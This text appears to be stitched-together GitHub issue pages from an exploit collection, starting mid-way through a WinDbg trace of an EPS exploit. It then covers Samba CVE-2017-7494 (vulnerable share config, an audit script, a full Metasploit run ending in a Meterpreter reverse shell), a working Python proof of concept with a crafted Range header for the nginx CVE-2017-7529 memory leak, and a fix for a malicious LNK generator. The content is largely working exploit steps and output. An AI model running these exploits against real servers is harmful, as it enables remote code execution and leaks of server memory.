061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bc0000=8bf0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bb0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17

mem-eax-002

References

  1. https://www.hybrid-analysis.com/sample/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc?environmentId=100
  2. http://www.eteamz.com/ginysteams/files/POno46543.docx
  3. https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf
  4. https://www.ghostscript.com/
  5. http://blog.morphisec.com/exploit-bypass-emet-cve-2015-2545
  6. https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
  7. https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html
  8. https://gist.github.com/subTee/54e72458af1c97f02e32
  9. http://casual-scrutiny.blogspot.jp/2016/02/cve-2015-2545-itw-emet-evasion.html
  10. https://blogs.msdn.microsoft.com/rihamselim/2012/03/14/breaking-on-module-load/
  11. https://stackoverflow.com/questions/10759661/manually-setting-breakpoints-in-windbg
  12. http://bbs.pediy.com/thread-216045.htm
  13. http://bbs.pediy.com/thread-216046.htm

[CVE-2017-7494] Samba - Remote code execution from a writable share

Bug Flow

-> /path/to/samba-X.X.XX

bug-flow

How to set up a vulnerable ENV?

Add the following contents to /etc/samba/smb.conf:

[CVE20177494]
   comment = CVE20177494
   path = /tmp
   public = yes
   # available = yes
   # browseable = yes
   writable = yes
   # printable = yes
   # guest ok = yes
   create mask = 0777
   directory mask = 0777

  • vulnerable version: samba 4.5.2

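As an added example (not part of the original issue), a small Python audit of an smb.conf for the two conditions this write-up depends on: a share that is writable, especially by guest users, and a [global] section without `nt pipe support = no`, the workaround the Samba advisory (reference 1 below) gives for hosts that cannot be upgraded. The sample configuration is constructed for the example and includes the share defined above; the synonym table covers the alternative spellings Samba accepts for the same parameters (`writeable`, `write ok`, `public`).

```python
import re

# Constructed sample smb.conf (not from the issue): a [global] section without
# the advisory's workaround, a read-only print$ share, and the writable guest
# share that the write-up above defines.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no

[CVE20177494]
   comment = CVE20177494
   path = /tmp
   public = yes
   # available = yes
   writable = yes
   create mask = 0777
   directory mask = 0777
"""

# smb.conf accepts several spellings for the same parameter; fold them to one.
SYNONYMS = {
    "writeable": "writable",
    "write ok": "writable",
    "public": "guest ok",
}

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {parameter: value}}.

    Keys are lower-cased, internal whitespace is collapsed and synonyms are
    folded.  Full-line comments start with '#' or ';'.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = re.sub(r"\s+", " ", key.strip().lower())
        sections[current][SYNONYMS.get(key, key)] = value.strip()
    return sections


def is_true(value):
    return value.strip().lower() in TRUE_VALUES


def share_is_writable(params):
    # 'read only' is the inverse of 'writable'; Samba defaults to read only = yes.
    # Simplification: 'writable' wins if both forms appear in one share.
    if "writable" in params:
        return is_true(params["writable"])
    if "read only" in params:
        return not is_true(params["read only"])
    return False


def share_allows_guest(params):
    return is_true(params.get("guest ok", "no"))


def audit_smb_conf(text):
    """Return findings relevant to CVE-2017-7494 as a list of strings."""
    sections = parse_smb_conf(text)
    findings = []

    # Workaround from the Samba advisory for hosts that cannot be upgraded:
    # 'nt pipe support = no' in [global].  Samba's default is yes.
    if is_true(sections.get("global", {}).get("nt pipe support", "yes")):
        findings.append("global: 'nt pipe support = no' is not set")

    for name, params in sections.items():
        if name == "global":
            continue
        if share_is_writable(params):
            who = "anonymous" if share_allows_guest(params) else "authenticated"
            findings.append("%s: writable by %s users (path %s)"
                            % (name, who, params.get("path", "?")))
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(finding)
```

Run against the sample, the audit reports the missing workaround and flags `CVE20177494` as writable by anonymous users while leaving the read-only `print$` share alone; with `nt pipe support = no` added and the share made read-only it reports nothing. The check is a configuration review only: the real fix is upgrading smbd, and the workaround disables named-pipe access for every client, which breaks some Windows tooling.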
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set RHOSTS 192.168.206.144
RHOSTS => 192.168.206.144
msf auxiliary(smb_enumshares) > run

[+] 192.168.206.144:139   - print$ - (DISK) Printer Drivers
[+] 192.168.206.144:139   - CVE20177494 - (DISK) CVE20177494
[+] 192.168.206.144:139   - IPC$ - (IPC) IPC Service (Samba 4.5.2-Debian)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.206.144
RHOST => 192.168.206.144
msf exploit(is_known_pipename) > set target 0
target => 0
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.206.144  yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.206.1:4444
[*] 192.168.206.144:445 - Using location \\192.168.206.144\CVE20177494\ for the path
[*] 192.168.206.144:445 - Hunting for payload using common path names: VZiaULDJ.so - //192.168.206.144/CVE20177494/
[*] 192.168.206.144:445 - Trying location /volume1/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /tmp/VZiaULDJ.so...
[*] Sending stage (797784 bytes) to 192.168.206.144
[*] Meterpreter session 1 opened (192.168.206.1:4444 -> 192.168.206.144:58682) at 2017-05-26 05:52:19 -0500

meterpreter > sysinfo
Computer     : sh.localdomain
OS           : Kali kali-rolling (Linux 4.6.0-kali1-686-pae)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > sysinfo
Computer     : sh.localdomain
OS           : Kali kali-rolling (Linux 4.6.0-kali1-686-pae)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > shell
Process 2702 created.
Channel 1 created.
smbd -V
Version 4.5.2-Debian

References

  1. https://www.samba.org/samba/security/CVE-2017-7494.html
  2. rapid7/metasploit-framework#8450

[Exploit] CVE-2017-7529 / Nginx - Remote Integer Overflow Vulnerability

Description

Nginx versions from 0.5.6 up to and including 1.13.2 are vulnerable to an integer overflow in the nginx range filter module, resulting in a leak of potentially sensitive information triggered by a specially crafted request.

#!/usr/bin/python
# -*- coding:utf-8 -*-

# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529

import requests
import logging
import sys


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def send_http_request(url, headers=None, timeout=8.0):
    # No mutable default argument; use a fresh dict when none is given.
    httpResponse   = requests.get(url, headers=headers or {}, timeout=timeout)
    httpHeaders    = httpResponse.headers

    log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
    return httpResponse


def exploit(url):
    log.info("target: %s", url)
    # First request: learn the resource size from Content-Length.
    httpResponse   = send_http_request(url)

    content_length = httpResponse.headers.get('Content-Length', 0)
    # Ask for 623 more trailing bytes than the resource has, plus a second
    # suffix range sized so that the two lengths sum past 2**63 and wrap
    # nginx's signed 64-bit total.
    bytes_length   = int(content_length) + 623
    range_header   = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)

    httpResponse   = send_http_request(url, headers={ 'Range': range_header })
    # A 206 whose multipart body carries a Content-Range means the negative
    # range was accepted; a patched server ignores the header and answers 200.
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
        log.info("[+] Vulnerable to CVE-2017-7529")
    else:
        log.info("[?] Unknown Vulnerable")


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] %s <url>" % sys.argv[0])
        sys.exit(1)

    url = sys.argv[1]
    exploit(url)


"""
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png

"""

References

  1. https://nvd.nist.gov/vuln/detail/CVE-2017-7529
  2. https://hub.docker.com/r/vulapps/cve-2017-7529/

Bug at line number 232 when bindata is finally written into file (Windows Environment)

Hi,
First thanks for sharing this PoC.
When we run this code on Windows OS to generate the lnk file, it introduces the character '\x0D' before the length of the name (the length will be 10, '\x0A', after including the null char at the end of the name), i.e. "Microsoft" in this case. As the name Microsoft is hard coded there it will always do this, but if you change the name to any other name whose length is 10 (including the null byte) then this problem will persist.
Reason: As we are writing the final data to the file in simple "write mode" rather than "write in binary mode", it will write '\x0D\x0A' instead of '\x0A' because '\x0A' represents LF, which is replaced by CRLF (i.e. '\x0D\x0A') on Windows.
Solution: need to change the write mode to binary mode at line number 232, i.e.
with open(lnkpath, 'w') as lnkf:
change to
with open(lnkpath, 'wb') as lnkf:

and problem will be solved.
In Linux there is no problem.

Thanks
